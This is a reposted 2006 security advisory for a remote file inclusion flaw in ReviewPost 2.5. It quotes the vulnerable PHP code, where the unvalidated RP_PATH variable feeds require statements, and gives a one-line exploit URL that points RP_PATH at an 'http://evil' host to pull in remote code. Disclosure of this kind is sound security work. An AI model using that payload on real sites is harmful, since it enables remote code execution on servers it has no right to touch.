ReviewPost 2.5 (RP_PATH) Remote File Inclusion

2006.09.21
Credit: bius
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################Solpot Crew Community############################## # # ReviewPost 2.5 (RP_PATH) Remote File Inclusion # # Donwload File : http://3-bius.com/ReviewPost.zip # ######################################################################## ######### # # # Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006) # # contact: bius (at) mac (dot) com [email concealed] # # Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt # ######################################################################## ######## # # # Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry # imam26_it,ant1casper(tolong tambahin ya) # #nyubi , #hitamputih @dalnet # and all member solpotcrew community # http://www.nyubicrew.org/forum/ # especially thx to Solpot @ nyubi (at) dal (dot) net [email concealed] # ######################################################################## ####### Input passed to the "RP_PATH" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from index.php <?php require "pp-inc.php"; if ( is_numeric($argv[0]) ) { header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}"); exit; } require "$RP_PATH/languages/$rplang/index.php"; require "$RP_PATH/login-inc.php"; if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) { diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." ); exit; } ?> nb : others file has vulnerable too :) exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil ######################################################################## ##### ######################################E.O.F############################# #####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top